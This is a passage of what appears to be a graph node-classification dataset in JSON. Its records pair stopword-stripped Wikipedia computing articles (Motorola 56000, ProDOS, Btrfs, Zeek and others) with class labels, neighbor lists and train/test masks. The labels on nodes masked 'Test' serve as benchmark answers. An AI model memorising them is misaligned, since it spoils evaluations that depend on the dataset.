    "text": "Motorola_56000:motorola 56000 motorola dsp56000 also known 56k family digital signal processor dsp chips produced motorola semiconductor later known freescale semiconductor acquired nxp starting 1986 still produced advanced models 2010s 56k series quite popular time number computers including next atari falcon030 sgi indigo workstations using 56001 upgraded 56k versions still used audio equipment radars communications devices like mobile phones various embedded dsp applications 56000 also used basis updated 96000 commercially successful dsp56000 uses fixed-point arithmetic 24-bit program words 24-bit data words includes two 24-bit registers also referred single 48-bit register also includes two 56-bit accumulators 8-bit extension aka headroom otherwise accumulators similar 24/48-bit registers modified harvard architecture processor 56k three memory spaces+buses on-chip memory banks models program memory space/bus two data memory space/bus 24 bits selected basic word length gave system reasonable number range precision processing audio sound 56000 main concern 24 bits correspond large dynamic range sufficient 1980s analog-to-digital converters adcs digital-to-analog converters dacs rarely exceeded 20 bits one example adsl applications filters typically require 20 bits accuracy leftmost four bits considered ample headroom calculations processor capable carrying 16.5 million instructions per second mips maximum specified clock speed hardware support block-floating point fft uses ttl levels consumes approximately designs 56000 dedicated one single task digital signal processing using special hardware mostly real-time allow interruption somewhat mildly demanding tasks time-critical simple if-then type designers normally use separate cpu mcu 56000 execute 1024-point complex fast fourier transform fft takes rate 555 operations per second allowing realtime decoding encoding of/to reasonably advanced audio codecs mp3 direct-to-disc recording purposes addition simd instructions desktop computer cpus meant dedicated dsp chips like 56000 partly retreated application fields continue used widely communications professional uses end 56800 series added complete mcu created single-chip dspcontroller solution opposite occurred 68456—a 68000 56000 still quite prevalent model 56000 third generation 563xx family developed 2000s features several models special applications hard- firmware built-in like pci interface logic crc processors audio companders core clock frequencies ranged",
    "neighbors": [
      7299,
      3844,
      1029,
      1158,
      4868,
      7302,
      7305,
      10501,
      3467,
      1548,
      2454,
      2073,
      7065,
      8102,
      5297,
      11314,
      9911,
      11447,
      6715,
      1983,
      10945,
      3017,
      336,
      5457,
      3540,
      3932,
      477,
      8058,
      3936,
      7269,
      10603,
      1776,
      3185,
      8048,
      10224,
      7286,
      3319,
      1530,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 8762,
    "label": 1,
    "text": "Sedna_(database):sedna database sedna open-source database management system provides native storage xml data distinctive design decisions employed sedna schema-based clustering storage strategy xml data ii memory management based layered address space data organization sedna designed goal providing balance performance xml queries updates execution two primary design decisions data organization sedna following figure illustrates overall principles data organization sedna descriptive schema represented tree schema nodes central component data organization schema node labeled xml node kind e.g element attribute text etc pointer data blocks store xml nodes corresponding given schema node depending node kind schema nodes also labeled names e.g. element nodes attribute nodes data blocks related common schema node linked via pointers bidirectional list node descriptors list blocks partly ordered according document order",
    "neighbors": [
      9828,
      1801,
      5612,
      7983,
      124,
      9397,
      6775,
      2780,
      2045,
      5598,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 8763,
    "label": 9,
    "text": "Page_description_language:page description language digital printing page description language pdl computer language describes appearance printed page higher level actual output bitmap overlapping term printer control language includes hewlett-packard printer command language pcl postscript one noted page description languages markup language adaptation pdl page description markup language page description languages text human-readable binary data streams usually intermixed text graphics printed distinct graphics application programming interfaces apis gdi opengl called software generate graphical output various page description languages exist",
    "neighbors": [
      5384,
      4751,
      1184,
      2221,
      6830,
      11694,
      8627,
      8628,
      4922,
      11074,
      9795,
      3524,
      9926,
      73,
      3323,
      10960,
      6993,
      1877,
      1760,
      4836,
      10352,
      119,
      3579
    ],
    "mask": "None"
  },
  {
    "node_id": 8764,
    "label": 4,
    "text": "Open_security:open security open security use open source philosophies methodologies approach computer security information security challenges traditional application security based premise application service whether malware desirable relies security obscurity open source approaches created technology linux extent android operating system additionally open source approaches applied documents inspired wikis largest example wikipedia open security suggests security breaches vulnerabilities better prevented ameliorated users facing problems collaborate using open source philosophies approach requires users legally allowed collaborate relevant software would need released license widely accepted open source examples include massachusetts institute technology mit license apache 2.0 license gnu lesser general public license lgpl gnu general public license gpl relevant documents would need generally accepted open content license include creative commons attribution cc-by attribution share alike cc-by-sa licenses creative commons non-commercial licenses no-derivative licenses developer side legitimate software service providers independent verification testing source code information technology side companies aggregate common threats patterns security solutions variety security issues",
    "neighbors": [
      10442,
      9293,
      7153,
      8050,
      4979,
      823,
      7515,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8765,
    "label": 9,
    "text": "DMPL:dmpl dmpl digital microprocessor plotter language vector graphics file format houston instruments developed control pen plotters later used cutting plotters language compatible hp-gl see eagle definition",
    "neighbors": [
      1801,
      9795
    ],
    "mask": "None"
  },
  {
    "node_id": 8766,
    "label": 8,
    "text": "Web_services_protocol_stack:web services protocol stack web service protocol stack protocol stack stack computer networking protocols used define locate implement make web services interact web service protocol stack typically stacks four protocols web service protocol stack also includes whole range recently defined protocols bpel",
    "neighbors": [
      7364,
      2501,
      8070,
      904,
      6284,
      9909,
      10486,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 8767,
    "label": 2,
    "text": "Apple_ProDOS:apple prodos prodos name two similar operating systems apple ii series personal computers original prodos renamed prodos 8 version 1.2 last official operating system usable 8-bit apple ii series computers distributed 1983 1993 prodos 16 stop-gap solution 16-bit apple ii replaced gs/os within two years prodos marketed apple meaning professional disk operating system became popular operating system apple ii series computers 10 months release january 1983 prodos released address shortcomings earlier apple operating system called simply dos beginning show age apple dos built-in support 5.25 floppy disks requires patches use peripheral devices hard disk drives non-disk-ii floppy disk drives including 3.5 floppy drives prodos adds standard method accessing rom-based drivers expansion cards disk devices expands maximum volume size 400 kilobytes 32 megabytes introduces support hierarchical subdirectories vital feature organizing hard disk storage space supports ram disks machines 128kb memory prodos addresses problems handling hardware interrupts includes well-defined documented programming expansion interface apple dos always lacked although prodos also includes support real-time clock rtc support went largely unused release apple ii first apple ii series include rtc board third-party clocks available ii plus iie iic however prodos unlike earlier apple dos versions developmental roots sos operating system ill-fated apple iii computer released 1980 pre-release documentation prodos including early editions beneath apple prodos documented sos error codes notably one switched disks prodos could never generate disk format programming interface completely different apple dos prodos read write dos 3.3 disks except means conversion utility low-level track-and-sector format dos 3.3 disks retained 5.25 inch disks high-level arrangement files directories completely different reason machine-language programs run apple dos work prodos however basic programs work though sometimes require minor changes third-party program called dos.master enables users multiple virtual dos 3.3 partitions larger prodos volume release prodos came end support integer basic original apple ii model long since effectively supplanted applesoft basic apple ii plus whereas dos 3.3 always loads built-in support basic programming prodos job given separate system program called basic.system one launches run write applesoft basic programs basic continued built apple roms basic.system merely command interpreter enhancement allows basic programs access prodos means control-d text output used dos 3.3 basic.system alone requires much memory whole dos 3.3 since prodos kernel stowed away language card ram usable amount ram basic programmers remains prodos dos 3.3 despite prodos many advantages many users programmers resisted time investment learning ins outs apple dos apple-dos-based software data formats contributing reason prodos allows 15 characters filename compared apple dos 30 apple integrated software package appleworks released 1984 proved compelling reason switch end 1985 new software products released older operating system apple iis continued able boot older dos even apple ii boot older dos floppies 3.5 floppies hard disks became prevalent users spent bulk time prodos apple iie also released 1983 first apple ii computer 64kb memory built apple shipped dos 3.3 prodos new computers original prodos renamed prodos 8 prodos 16 released support 16-bit apple ii computer although prodos 16 soon replaced gs/os editions prodos require apple ii series computer licensed compatible prodos 8 requires 64kb memory run original prodos 8 1.0 1.0.2 requires 48kb kernel nearly programs including basic.system needed use applesoft basic require 64kb making 48kb system useless prodos practical matter support 48kb machines removed version 1.1 prodos 8 version 2.x requires 65c02 later 65802 65816 cpu prodos 8 2.x runs 64kb utility programs system disk require 128kb systems 6502 cpu instead 65c02 must use prodos 8 versions prior version 2.0 unofficial prodos 8 2.4 released august 16 2016 removes 65c02 requirement run apple ii computers least 64 kb ram although basic.system still requires applesoft rom prodos 16 requires apple iigs release prodos version 1.01 higher check added see running official apple-manufactured computer word apple found computer rom firmware prodos load normal anything else found e.g golden franklin elite prodos refuses run locking boot splash screen measure taken apple computer discourage use unlicensed apple ii clones still possible run newer versions prodos clones however users apply small byte patch every successive version prodos users go far replacing physical rom chip illegal copied version apple rom failing custom patched rom apple added name prodos 8 natively supports disk ii-compatible floppy drives ram drive approximately 59kb computers 128k ram block devices whose controllers support pascal firmware protocol standardized method accepting block reads writes originally introduced use ucsd p-system latter category includes 3.5 disk hard drives custom block device drivers hooked os well prodos uses file system earlier apple sos apple iii sos/prodos file system native apple sos prodos 8 prodos 16 gs/os classic mac os versions also come file system translator handle file system volume allocated 512-byte blocks 5.25 floppy disks still formatted using 256-byte sectors format required controller rom boot disk prodos simply treats pairs 256-byte sectors single block drives volume capacity 32 megabytes file 16 megabytes volume floppy disk hard drive partition volume name filename used base directory name two volumes volume name result conflicts necessary prodos searches available drives find named volume subdirectories supported concept prefix working directory current path provided make working subdirectories easier file directory volume names 1 15 characters starting letter containing letters digits periods file entry also contains 16 bit 2 byte pointer block containing beginning file block index 16-bit block count 24-bit 3-byte file size 8-bit 1-byte filetype 16-bit auxiliary type meaning depends upon filetype creation modification timestamps data related file stored volume sparse files supported files never sparsified removing zero-filled blocks volume header contains similar information relevant volumes directories including root directory sequentially indexed block starting address previous block zero none subsequent block zero none root directory disks initialized 4 blocks allowing 51 entries excluding volume header never changes size except manual intervention special tools subdirectories begin one block grow automatically needed normal files progressively indexed single-block files 513 bytes index block directory entry points directly block file data files 2 256 blocks 513 bytes 128 kb data single index block directory entry points contains list 256 data block addresses larger files master index block containing list 256 index block addresses apple iigs introduced new storage format introduced files two forks typical iigs system program files directory entry points informational block tells computer storage format two forks files read written natively prodos 8 though volume remains compatible volume bitmap used blocks central file allocation table prodos 8 volume formatted apple tools boot sector supports booting prodos sos depending computer booted block 0 apple ii boot block block 1 boots sos allows disk used boot either apple ii apple iii computers putting operating system kernels top directory apple ii boot sector looks file prodos apple iii boot sector looks file sos.kernel third-party formatting utilities often provide sos boot block would even mark block 1 available user data prodos kernel support file systems necessary conversion utility main system disk used transfer files individually prodos older apple dos 3.3 disks use different low-level disk format dos 3.3 prodos transferring data dos 3.2 disks prodos two-step process using dos 3.3 disk intermediary utilizing dos 3.3 utility muffin similar",
    "neighbors": [
      2304,
      2179,
      9732,
      2181,
      10755,
      6023,
      6539,
      7307,
      4114,
      6675,
      11411,
      3867,
      9762,
      11171,
      11430,
      3241,
      6186,
      5293,
      7983,
      3248,
      8754,
      8115,
      7991,
      9784,
      2363,
      7483,
      2365,
      2366,
      8510,
      576,
      11257,
      3522,
      10691,
      10052,
      11513,
      8774,
      712,
      5457,
      3286,
      1623,
      9308,
      7133,
      3167,
      3681,
      5093,
      5733,
      5862,
      10855,
      6377,
      3948,
      5359,
      1776,
      3571,
      5363,
      2933,
      5619,
      8441
    ],
    "mask": "Test"
  },
  {
    "node_id": 8768,
    "label": 4,
    "text": "Intervasion_of_the_UK:intervasion uk intervasion uk 1994 electronic civil disobedience collective action john major criminal justice bill sought outlaw outdoor dance festivals music repetitive beat launched group called zippies san francisco 181 club guy fawkes day november 5 1994 resulted government websites going least week utilised form distributed denial service ddos known email bomb order overload servers form online protest internet activism first use internet technology weapon struggle and/or civil disobedience preceded criminal justice public order act 1994 definition music played rave given music includes sounds wholly predominantly characterised emission succession repetitive beats sections 63 64 65 act targeted electronic dance music played raves criminal justice public order act empowered police stop rave open air ten people attending two making preparations rave section 65 allowed uniformed constable believes person way rave within radius stop direct away area non-compliant citizens may subject maximum fine exceeding level 3 standard scale £1000 zippies sought jam mailboxes uk politicians associated bill order bring attention issue natural justice involving basic rights freedoms effect collective action saying take away freedom power take away something take granted way deploys internet weapon several hackers directly associated group launched all-out penetration testing load testing operations several uk government websites resulting tit-for-tat battle zippies mailbox morph.com went along entire server morph well-known bay area bbs event broadcast radio free berkeley protest action occurred manhunt kevin mitnick thus partly underground event media also refused entertain implications electronic civil disobedience public attention focused problem illegal raves black-hat hackers prompting scare stories evil hackers young hoodlums penetrating british defences zippies written nothing electrohippies criticism intervasion expressed electronic frontier foundation complained lack cutoff date criticism whole earth 'lectronic link well bbs centered use militant language online protest action also suffered conflict stated aims clog servers uk government call send email messages uk politicians thus jamming mailboxes email large file attachments defeated purpose exercise essentially early form hacktivism nature collective action also articulated well enough instance digital be-in occurred launch timothy leary chaos cyberculture leary kidnapped without consent publisher forced ddos uk government simply protest message sent repeatedly mail-boxes around world",
    "neighbors": [
      2251
    ],
    "mask": "None"
  },
  {
    "node_id": 8769,
    "label": 8,
    "text": "Proximic:proximic proximic platform provides real-time data services contextual data online advertisers agencies company based palo alto research development facilities munich company ceo philipp pieper co-founded company mathematician thomas nitsche thomas nitsche elmar henne proximic chief architect developed mephisto chess computer chief scientist louis monier founder altavista search engine proximic launched alpha testing mode late 2007 2010 company integrated real-time ad platform appnexus started offer contextual data services display advertisers agencies may 2015 proximic acquired comscore",
    "neighbors": [
      3744,
      3875,
      2566,
      714,
      2318,
      944,
      113,
      11284,
      1240,
      4473,
      2459
    ],
    "mask": "Test"
  },
  {
    "node_id": 8770,
    "label": 4,
    "text": "Zeek:zeek zeek formerly bro free open-source software network analysis framework originally developed 1994 vern paxson named reference george orwell big brother novel nineteen eighty-four used network intrusion detection system nids additional live analysis network events released bsd license ip packets captured pcap transferred event engine accepts rejects accepted packets forwarded policy script interpreter event engine analyzes live recorded network traffic trace files generate neutral events generates events something happens triggered zeek process initialization termination zeek process well something taking place network trace file analyzed zeek witnessing http request new tcp connection zeek uses common ports dynamic protocol detection involving signatures well behavioral analysis make best guess interpreting network protocols events policy neutral good bad simply signals script land something happened events handled policy scripts analyze events create action policies scripts written turing complete zeek scripting language default zeek simply logs information events files zeek also supports logging events binary output however configured take actions sending email raising alert executing system command updating internal metric even calling another zeek script default behavior produces netflow-like output conn log well application event information zeek scripts able read data external files blacklists use within zeek policy scripts zeek analyzers located zeek event engine accompanying policy script policy script customized user analyzers perform application layer decoding anomaly detection signature matching connection analysis zeek designed easy add additional analyzers application layer analyzers included zeek http ftp smtp dns amongst others non-application layer analyzers include analyzers detect host port scans intermediary hosts syn-floods zeek also includes signature detection allows import snort signatures",
    "neighbors": [
      7813,
      6345,
      7983,
      5492,
      11221,
      823,
      2299
    ],
    "mask": "Test"
  },
  {
    "node_id": 8771,
    "label": 9,
    "text": "LispWorks:lispworks lispworks computer software proprietary implementation integrated development environment ide programming language common lisp lispworks developed uk software company harlequin ltd. first published 1989 harlequin ultimately spun lisp division xanalys ltd. took management rights lispworks january 2005 xanalys lisp team formed lispworks ltd. market develop support software lispworks features include enterprise edition also includes knowledgeworks supports rule-based logic programming including support prolog commonsql database interface common object request broker architecture corba binding september 2009 announced lispworks 6 would support concurrent threads capi graphics toolkit extended support gtk+ lispworks 6.1 released january 2012 includes many enhancements capi support anti-aliased drawing lispworks ran spacecraft deep space 1 application called rax nasa software year award 1999",
    "neighbors": [
      10752,
      11269,
      2056,
      9224,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      9245,
      8226,
      2603,
      5165,
      5677,
      3119,
      3631,
      2105,
      6201,
      3132,
      6717,
      576,
      8258,
      10819,
      8262,
      1613,
      9299,
      10841,
      3675,
      2658,
      7267,
      2660,
      8293,
      3176,
      2666,
      2667,
      5743,
      8303,
      2673,
      8304,
      5751,
      9848,
      5754,
      7292,
      7805,
      1664,
      9345,
      1666,
      1159,
      9865,
      6797,
      9877,
      3734,
      4777,
      4779,
      5803,
      2225,
      11442,
      8883,
      692,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      4822,
      9943,
      7896,
      9434,
      5852,
      10463,
      7392,
      7904,
      11488,
      8421,
      10470,
      11495,
      5356,
      9964,
      4846,
      5360,
      5361,
      9969,
      8435,
      2804,
      10480,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      10510,
      9491,
      1812,
      1301,
      10012,
      3869,
      2335,
      2849,
      3876,
      11559,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      1347,
      1348,
      11083,
      8524,
      3408,
      6994,
      1365,
      2392,
      6493,
      10083,
      6502,
      11625,
      8554,
      9579,
      5492,
      3446,
      1399,
      10104,
      377,
      4992,
      2438,
      3462,
      8582,
      7562,
      6556,
      10654,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      8618,
      9128,
      7616,
      5569,
      6594,
      8644,
      4550,
      7629,
      11218,
      10712,
      3034,
      479,
      3051,
      5611,
      5612,
      7670,
      11255,
      8700,
      2045,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 8772,
    "label": 6,
    "text": "Btrfs:btrfs btrfs pronounced butter fuss better f butter f b-tree f simply spelling file system based copy-on-write cow principle initially designed oracle corporation use linux development btrfs began 2007 since november 2013 file system on-disk format marked stable btrfs intended address lack pooling snapshots checksums integral multi-device spanning linux file systems chris mason principal btrfs author stated goal let linux scale storage available scaling addressing storage also means able administer manage clean interface lets people see used makes reliable core data structure btrfsthe copy-on-write b-treewas originally proposed ibm researcher ohad rodeh presentation usenix 2007 chris mason engineer working reiserfs suse time joined oracle later year began work new file system based b-trees 2008 principal developer ext3 ext4 file systems theodore ts stated although ext4 improved features major advance uses old technology stop-gap ts said btrfs better direction offers improvements scalability reliability ease management btrfs also number design ideas reiser3/4 btrfs 1.0 finalized on-disk format originally slated late-2008 release finally accepted linux kernel mainline 2009 several linux distributions began offering btrfs experimental choice root file system installation july 2011 btrfs automatic defragmentation scrubbing features merged version 3.0 linux kernel mainline besides mason oracle miao xie fujitsu contributed performance improvements june 2012 chris mason left oracle fusion-io left year later josef bacik join facebook companies mason continued work btrfs 2012 two linux distributions moved btrfs experimental production supported status oracle linux march followed suse linux enterprise august 2015 btrfs adopted default filesystem suse linux enterprise server 12 august 2017 red hat announced release notes red hat enterprise linux rhel 7.4 longer planned move btrfs included technology preview since rhel 6 beta fully supported feature noting would remain available rhel 7 release series btrfs removed rhel 8 may 2019 version 5.0 linux kernel btrfs implements following features 2009 btrfs expected offer feature set comparable zfs developed sun microsystems oracle acquisition sun 2009 mason oracle decided continue btrfs development btrfs provides clone operation atomically creates copy-on-write snapshot file cloned files sometimes referred reflinks light associated linux kernel system calls cloning file system create new link pointing existing inode instead creates new inode initially shares disk blocks original file result cloning works within boundaries btrfs file system since version 3.6 linux kernel may cross boundaries subvolumes certain circumstances actual data blocks duplicated time due copy-on-write cow nature btrfs modifications cloned files visible original file vice versa cloning confused hard links directory entries associate multiple file names actual files file system hard links taken different names file cloning btrfs provides independent files share disk blocks support btrfs feature added version 7.5 gnu coreutils via codice_2 option codice_3 command btrfs subvolume thought separate posix file namespace mountable separately passing codice_4 codice_5 options utility also accessed mounting top-level subvolume case subvolumes visible accessible subdirectories subvolumes created place within file system hierarchy also nested nested subvolumes appear subdirectories within parent subvolumes similarly way top-level subvolume presents subvolumes subdirectories deleting subvolume possible subvolumes nesting hierarchy deleted result top-level subvolumes deleted btrfs file system always default subvolume initially set top-level subvolume mounted default subvolume selection option passed codice_6 default subvolume changed required btrfs snapshot subvolume shares data metadata subvolume using btrfs copy-on-write capabilities modifications snapshot visible original subvolume writable snapshot made treated alternate version original file system example roll back snapshot modified original subvolume needs unmounted snapshot needs mounted place point original subvolume may also deleted copy-on-write cow nature btrfs means snapshots quickly created initially consuming little disk space since snapshot subvolume creating nested snapshots also possible taking snapshots subvolume recursive process thus snapshot subvolume created every subvolume snapshot subvolume already contains mapped empty directory name inside snapshot taking snapshots directory possible subvolumes snapshots however workaround involves reflinks spread across subvolumes new subvolume created containing cross-subvolume reflinks content targeted directory available snapshot new volume created subvolume btrfs quite different traditional logical volume manager lvm logical volume lvm logical volume separate block device btrfs subvolume treated used way making dd lvm snapshots btrfs leads dataloss either original copy mounted computer given pair subvolumes snapshots btrfs generate binary diff using codice_7 command replayed later using codice_8 possibly different btrfs file system send–receive feature effectively creates applies set data modifications required converting one subvolume another send/receive feature used regularly scheduled snapshots implementing simple form file system master–slave replication purpose performing incremental backups quota group qgroup imposes upper limit space subvolume snapshot may consume new snapshot initially consumes quota data shared parent thereafter incurs charge new files copy-on-write operations existing files quotas active quota group automatically created new subvolume snapshot initial quota groups building blocks grouped codice_9 command hierarchies implement quota pools quota groups apply subvolumes snapshots quotas enforced individual subdirectories users user groups possible however workarounds possible using different subvolumes users user groups require quota enforced result little metadata anchored fixed locations btrfs warp fit unusual spatial layouts backend storage devices codice_10 tool exploits ability in-place conversion ext2/3/4 reiserfs file system nesting equivalent btrfs metadata unallocated space—while preserving unmodified copy original file system conversion involves creating copy whole ext2/3/4 metadata btrfs files simply point blocks used ext2/3/4 files makes bulk blocks shared two filesystems conversion becomes permanent thanks copy-on-write nature btrfs original versions file data blocks preserved file modifications conversion becomes permanent blocks marked free ext2/3/4 used hold new btrfs modifications meaning conversion undone time although erase changes made conversion btrfs converted files available writable default subvolume btrfs sparse file holding references original ext2/3/4 filesystem created separate subvolume mountable read-only disk image allowing original converted file systems accessed time deleting sparse file frees space makes conversion permanent june 2015 4.x versions linux kernel mainline in-place ext3/4 conversion considered untested rarely used feature however rewritten scratch 2016 codice_11 4.6. considered stable since in-place conversion reiserfs introduced september 2017 kernel 4.13 creating new btrfs existing btrfs used read-only seed file system new file system act copy-on-write overlay seed form union mounting seed later detached btrfs point rebalancer simply copy seed data still referenced new file system detaching mason suggested may useful live cd installer might boot read-only btrfs seed optical disc rebalance target partition install disk background user continues work eject disc complete installation without rebooting 2009 interview chris mason stated support encryption planned btrfs meantime workaround combining encryption btrfs use full-disk encryption mechanism dm-crypt luks underlying devices create btrfs filesystem top layer unix systems traditionally rely fsck programs check repair filesystems functionality implemented via codice_12 program since version 4.0 functionality deemed relatively stable however august 2017 btrfs documentation suggests used tried recovery methods another tool named codice_13 used recover files unmountable filesystem without modifying broken filesystem i.e. non-destructively normal use btrfs mostly self-healing recover broken root trees mount time thanks making periodic data flushes permanent storage default every 30 seconds thus isolated errors cause maximum 30 seconds filesystem changes lost next mount period changed specifying desired value seconds codice_14 mount option ohad rodeh original proposal usenix 2007 noted b+ trees widely used on-disk data structures databases could efficiently allow copy-on-write-based snapshots leaf nodes linked together leaf copy-on-written siblings parents would well would siblings parents entire tree copied suggested instead modified b-tree leaf linkage refcount associated tree node stored ad-hoc free map structure certain relaxations tree balancing algorithms make copy-on-write friendly result would data structure suitable high-performance object store could perform copy-on-write snapshots maintaining good concurrency oracle later year chris mason began work snapshot-capable file system would use data structure almost exclusively—not metadata file data also recursively track space allocation trees allowed traversal modifications funneled single code path features copy-on-write checksumming mirroring needed implemented benefit entire file system btrfs structured several layers trees using b-tree implementation trees store generic items sorted 136-bit key first 64 bits key unique object id middle 8 bits item type field use hardwired code item filter tree lookups objects multiple items multiple types remaining right-hand 64 bits used type-specific ways therefore items object end adjacent tree ordered type choosing certain right-hand key values objects put items type particular order interior tree nodes simply flat lists key-pointer pairs pointer logical block number child node leaf nodes contain item keys packed front node item data packed end two growing toward leaf fills every tree appears object root tree tree tree roots trees file system trees log trees variable number instances given object id trees singletons data relocation extent chunk trees assigned special fixed object ids ≤256 root tree appears tree object id 1 trees refer object id may also refer individual nodes trees triplet tree object id node level within tree leftmost key value references independent tree actually stored user-visible files directories contained file system tree one file system tree per subvolume subvolumes nest case appear directory item described whose data reference nested subvolume file system tree within file system tree file directory object inode item extended attributes acl entries stored alongside separate items within directory directory entries appear directory items whose right-hand key values crc32c hash filename data location key key inode item points directory items together thus act index path-to-inode lookups used iteration sorted hash effectively randomly permuting means user applications iterating opening files large directory would thus generate many disk seeks non-adjacent files—a notable performance drain file systems hash-ordered directories reiserfs ext3 htree-indexes enabled ext4 tea-hashed filenames avoid directory entry directory index item whose right-hand key value item set per-directory counter increments new directory entry iteration index items thus returns entries roughly order stored disk besides inode items files directories also reference item whose right-hand key value object id parent directory data part reference item filename inode known directory allows upward traversal directory hierarchy providing way map inodes back paths files hard links multiple directories multiple reference items one parent directory files multiple hard links directory pack links filenames reference item design flaw limited number same-directory hard links however many could fit single tree block default block size 4 kib average filename length 8 bytes per-filename header 4 bytes would less 350 applications made heavy use multiple same-directory hard links git gnus gmame backuppc later observed fail hitting limit limit eventually removed october 2012 merged pending release linux 3.7 introducing spillover extended reference items hold hard link filenames could otherwise fit file data kept outside tree extents contiguous runs disk blocks extent blocks default 4kib size headers contain possibly compressed file data compressed extents individual blocks compressed separately rather compression stream spans entire extent files extent data items track extents hold contents item right-hand key value starting byte offset extent makes efficient seeks large files many extents correct extent given file offset computed one tree lookup snapshots cloned files share extents small part large extent overwritten resulting copy-on-write may create three new extents small one containing overwritten data two large ones unmodified data either side overwrite avoid re-write unmodified data copy-on-write may instead create bookend extents extents simply slices existing extents extent data items allow including offset extent tracking items bookends non-zero offsets file data small enough fit inside tree node instead pulled in-tree stored inline extent data item tree node stored tree block —a single uncompressed block header tree block regarded free-standing single-block extent extent allocation tree acts allocation map file system unlike trees items tree object ids represent regions space left-hand right-hand key values starting offsets lengths regions represent file system zones allocated space block groups variable-sized allocation regions alternate successively preferring metadata extents tree nodes data extents file contents default ratio data metadata block groups 1:2 intended work like orlov block allocator block groups ext3 allocating related files together resisting fragmentation leaving allocation gaps groups ext3 block groups however fixed locations computed size file system whereas btrfs dynamic created needed block group associated block group item inode items file system tree include reference current block group extent items contain back-reference tree node file occupying extent may multiple back-references extent shared snapshots many back-references fit item spill individual extent data reference items tree nodes turn back-references containing trees makes possible find extents tree nodes region space b-tree range lookup pair offsets bracketing region following back-references relocating data allows efficient upwards traversal relocated blocks quickly find fix downwards references blocks without walk entire file system turn allows file system efficiently shrink migrate defragment storage online extent allocation tree trees file system copy-on-write writes file system may thus cause cascade whereby changed tree nodes file data result new extents allocated causing extent tree change avoid creating feedback loop extent tree nodes still memory yet committed disk may updated in-place reflect new copy-on-written extents theory extent allocation tree makes conventional free-space bitmap unnecessary extent allocation tree acts b-tree version bsp tree practice however in-memory red-black tree page-sized bitmaps used speed allocations bitmaps persisted disk starting linux 2.6.37 via codice_15 mount option special extents exempt checksumming copy-on-write extent items tracking extents stored root tree crc-32c checksums computed data metadata stored checksum items checksum tree room 256 bits metadata checksums full leaf block roughly 4 kb data checksums checksum algorithm options planned future one checksum item per contiguous run allocated blocks per-block checksums packed end-to-end item data checksums fit spill rightwards another checksum item new leaf file system detects checksum mismatch reading block first tries obtain create good copy block another device internal mirroring raid techniques use btrfs initiate online check entire file system triggering file system scrub job performed background scrub job scans entire file system integrity automatically attempts report repair bad blocks finds along way fsync request commit modified data immediately stable storage fsync-heavy workloads like database virtual machine whose running os fsyncs intensively could potentially generate great deal redundant write i/o forcing file system repeatedly copy-on-write flush frequently modified parts trees storage avoid temporary per-subvolume log tree created journal fsync-triggered copy-on-writes log trees self-contained tracking extents keeping checksum items items replayed deleted next full tree commit system crash next remount block devices divided physical chunks 256 mb physical chunks across multiple devices mirrored striped together single logical chunk logical chunks combined single logical address space rest filesystem uses chunk tree tracks storing device therein device item logical chunks chunk map items provide forward mapping logical physical addresses storing offsets right-hand 64 bits key chunk map items one several different types n however many block devices still free space chunk allocated n large enough chosen mirroring/mapping filesystem effectively space device tree inverse chunk tree device extent items provide reverse mapping byte-ranges block devices back logical chunks storing device number left hand 64-bits physical offset right-hand 64 bits key two trees together allow btrfs grow shrink even change raid levels without unmounting make possible efficiently locate chunks affected shrink/move operations relocate contents on-the-fly file system chunks devices assigned universally unique identifier uuid header every tree node contains uuid containing chunk uuid file system chunk device trees refer devices chunks uuids filesystems single block device dup also default profile metadata intended improve odds successful data salvage event media errors defragmentation shrinking rebalancing operations require extents relocated however simple copy-on-write relocating extent break sharing snapshots consume disk space preserve sharing update-and-swap algorithm used special relocation tree serving scratch space affected metadata extent relocated first copied destination following backreferences upward affected subvolume file system tree metadata pointing old extent progressively updated point new one newly updated items stored relocation tree update complete items relocation tree swapped counterparts affected subvolume relocation tree discarded file system trees—including chunk tree itself—are stored chunks creating potential bootstrapping problem mounting file system bootstrap mount list physical addresses chunks belonging chunk root trees must stored superblock superblock mirrors kept fixed locations 64 kib every block device additional copies 64 mib 256 gib 1 pib superblock mirror updated generation number incremented mount time copy highest generation number used superblock mirrors updated tandem except ssd mode alternates updates among mirrors provide wear levelling",
    "neighbors": [
      5120,
      2051,
      2564,
      9224,
      3082,
      6669,
      3598,
      10257,
      5139,
      9236,
      6677,
      5142,
      8214,
      10774,
      1049,
      3611,
      10780,
      5661,
      10272,
      9249,
      3618,
      9762,
      6180,
      2597,
      5158,
      10785,
      8242,
      9266,
      3640,
      7225,
      9784,
      11323,
      7229,
      8254,
      10817,
      6213,
      8268,
      1109,
      10851,
      4708,
      5222,
      10856,
      8298,
      9836,
      7789,
      7794,
      9333,
      6263,
      9335,
      1150,
      4734,
      9343,
      7812,
      8326,
      5256,
      7818,
      654,
      4238,
      10382,
      2193,
      2194,
      2195,
      2197,
      2198,
      2199,
      2711,
      6808,
      9882,
      11419,
      1694,
      2723,
      6309,
      1190,
      5286,
      10405,
      5293,
      3248,
      7344,
      10933,
      2230,
      5815,
      5816,
      3257,
      1212,
      8380,
      5822,
      3265,
      10951,
      1736,
      2762,
      9420,
      8909,
      3791,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      10971,
      4829,
      6365,
      8928,
      1761,
      739,
      7907,
      11492,
      2278,
      233,
      4841,
      8938,
      1263,
      3312,
      9455,
      3826,
      2291,
      9972,
      10482,
      246,
      2294,
      8439,
      2809,
      3834,
      3328,
      7938,
      11012,
      4360,
      2314,
      8461,
      6416,
      1810,
      3859,
      9490,
      1813,
      6935,
      792,
      11033,
      287,
      10016,
      1825,
      6434,
      5413,
      6438,
      295,
      3368,
      4907,
      9004,
      302,
      7983,
      11568,
      6961,
      819,
      1844,
      6963,
      823,
      6968,
      7992,
      6970,
      318,
      11072,
      3909,
      3911,
      2378,
      6988,
      4431,
      10063,
      5969,
      2901,
      4438,
      5975,
      346,
      2395,
      2397,
      3422,
      3428,
      10596,
      2407,
      10087,
      10091,
      7540,
      11638,
      6519,
      376,
      11128,
